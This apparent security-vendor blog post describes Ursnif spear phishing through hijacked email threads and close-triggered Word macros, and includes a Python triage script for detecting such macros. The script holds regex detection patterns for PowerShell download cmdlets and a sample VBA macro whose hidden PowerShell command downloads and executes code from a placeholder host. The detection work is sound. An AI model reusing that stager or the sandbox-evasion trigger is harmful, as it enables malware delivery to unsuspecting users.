A new wave of innovative spear phishing emails has been spotted distributing Ursnif, one of the world's most active and widespread banking trojans.
What makes the spear phishing emails unique: They appear to be using compromised email accounts to reply to active email threads.
Payload delivered via Word docs and macros: The emails include a Word doc attachment with a malicious macro that downloads the Ursnif payload.
What Ursnif does: Ursnif is a multipurpose trojan designed to steal a wide variety of victim information, from banking and credit card credentials via man-in-the-browser attacks to other passwords and private info via keylogging and screenshots.
Getting past many AVs: At the time of this writing, this new variant of Ursnif has a very low detection rate among security products.
Blocking Ursnif: Barkly provides multi-layered protection against these attacks by blocking both the Ursnif payload and the macro that attempts to download it in the first place.
What makes the spear phishing emails in these attacks especially dangerous is that they appear to be utilizing the email accounts of previous victims, in some cases even disguising the messages as replies to existing emails.
Attackers replying to active email chains to spread the infection
In one case, a Barkly user received what appeared to be a response to emails they had been exchanging with contacts at another organization. The new email looked like it was coming from another contact at that organization, who was replying to the previous messages that had been sent.
The new message was noticeably short: "Morning, please see attached and confirm," but in the context of the email chain it was very convincing.
The user opened the attachment — a Word document named "Request.doc" (pictured below) — and followed the instructions it provided to enable macros. Because Ursnif deploys evasive anti-sandbox techniques, it actually waits to launch the macro until the Word document is closed.
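The close-triggered macro described above is worth checking for statically, because a sandbox that opens a document and waits for AutoOpen never sees it fire. The following triage function is an added example, not Barkly's code or anything from the attack itself; the VBA it scans is a constructed sample shaped like the behavior described here (close-event entry point, process spawn, PowerShell download stager), and the domain in it is a placeholder.

```python
import re

# Word VBA auto-exec entry points. Close-triggered ones are tracked separately
# because a macro that only runs when the document is closed evades sandboxes
# that open the file, wait, and never close it.
OPEN_TRIGGERS = ("AutoOpen", "Document_Open", "AutoExec", "Document_New")
CLOSE_TRIGGERS = ("AutoClose", "Document_Close", "AutoExit")

# Process-spawn primitives, a PowerShell invocation, and download/execute cmdlets.
EXEC_RE = re.compile(r'\b(Shell\b|WScript\.Shell|CreateObject\(\s*"?WScript\.Shell)', re.I)
PS_RE = re.compile(r"\bpowershell(\.exe)?\b", re.I)
DOWNLOAD_RE = re.compile(
    r"(Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|"
    r"\bIEX\b|Invoke-Expression|FromBase64String)", re.I)


def find_triggers(vba: str, names) -> list:
    """Return the auto-exec procedure names actually declared in the source."""
    return [n for n in names if re.search(rf"\bSub\s+{n}\s*\(", vba, re.I)]


def triage_vba(vba: str) -> dict:
    """Static triage of a VBA module: which auto-exec hooks exist, whether it
    spawns a process, and whether that process looks like a download stager."""
    open_hits = find_triggers(vba, OPEN_TRIGGERS)
    close_hits = find_triggers(vba, CLOSE_TRIGGERS)
    spawns = bool(EXEC_RE.search(vba))
    powershell = bool(PS_RE.search(vba))
    downloads = bool(DOWNLOAD_RE.search(vba))
    triggered = bool(open_hits or close_hits)
    if triggered and spawns and (powershell or downloads):
        verdict = "malicious"
    elif (triggered and spawns) or (spawns and downloads):
        verdict = "suspicious"
    else:
        verdict = "benign"
    return {
        "open_triggers": open_hits,
        "close_triggers": close_hits,
        # Close-only execution is the sandbox-evasion pattern described in the post.
        "sandbox_evasion": bool(close_hits) and not open_hits,
        "spawns_process": spawns,
        "powershell": powershell,
        "download_stager": downloads,
        "verdict": verdict,
    }


# Constructed sample mirroring the described behavior; the URL is a placeholder.
SAMPLE_VBA = '''
Private Sub Document_Close()
    Dim cmd As String
    cmd = "powershell -w hidden -nop -c IEX (New-Object Net.WebClient).DownloadString('http://payload.invalid/r')"
    CreateObject("WScript.Shell").Run cmd, 0
End Sub
'''

if __name__ == "__main__":
    print(triage_vba(SAMPLE_VBA))
```

Pair this with a process-creation rule for winword.exe spawning powershell.exe: the static check catches the hook, the behavioral check catches it when the macro is obfuscated enough to slip the regexes.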
Once the document was closed and the macro was launched, Barkly's behavior analysis detected it attempting to execute the following PowerShell code designed to download a malicious payload:
By blocking that attempt from executing, Barkly stopped the attack short of payload delivery and prevented the user's machine from being infected.
By preventing the user from being infected, Barkly also prevented them from being turned into a new delivery vehicle for additional attacks, this time sent from their email account to their email contacts.
Unfortunately, this isn't the first time we've spotted a trojan hijacking victim email accounts to deliver more convincing spear phishing emails. In July, we blocked attacks attempting to spread the Emotet trojan in a similar way. If this is becoming a larger trend, it puts even more emphasis on blocking these attacks at the earliest stage possible, before they have a chance to take hold and turn victims into unknowing attackers.
Ursnif (also known as Gozi) has been an active threat since its discovery in 2007. While, traditionally, its favorite targets have been financial institutions (most recently Japanese banks), it has recently expanded its operations to target a wider variety of organizations as well as a wider variety of credential types.
Most often thought of as a banking trojan, Ursnif now actively seeks out credentials for email accounts, cloud storage accounts, cryptocurrency exchange platforms, and e-commerce sites (in addition to banking and credit card accounts).
Ursnif is capable of stealing information via a variety of techniques, including web injections, man-in-the-browser functionality, keylogging, screenshot grabbing, and more.
In recent years, the trojan has been updated with a variety of advanced features designed to help it evade sandboxes and even bypass behavioral biometrics defenses by logging and mimicking the speed and cadence at which users type, move their cursors, and submit their information into form fields.
The latest version of Ursnif being delivered in these spear phishing emails also deletes copies of itself once it has been executed, making it more difficult to detect and analyze.
We'll continue to monitor Ursnif closely and watch how it evolves.
Word doc: 32695d63215d0bd76887f1373b89607f6b73b193f37f044a518afe3db446bd65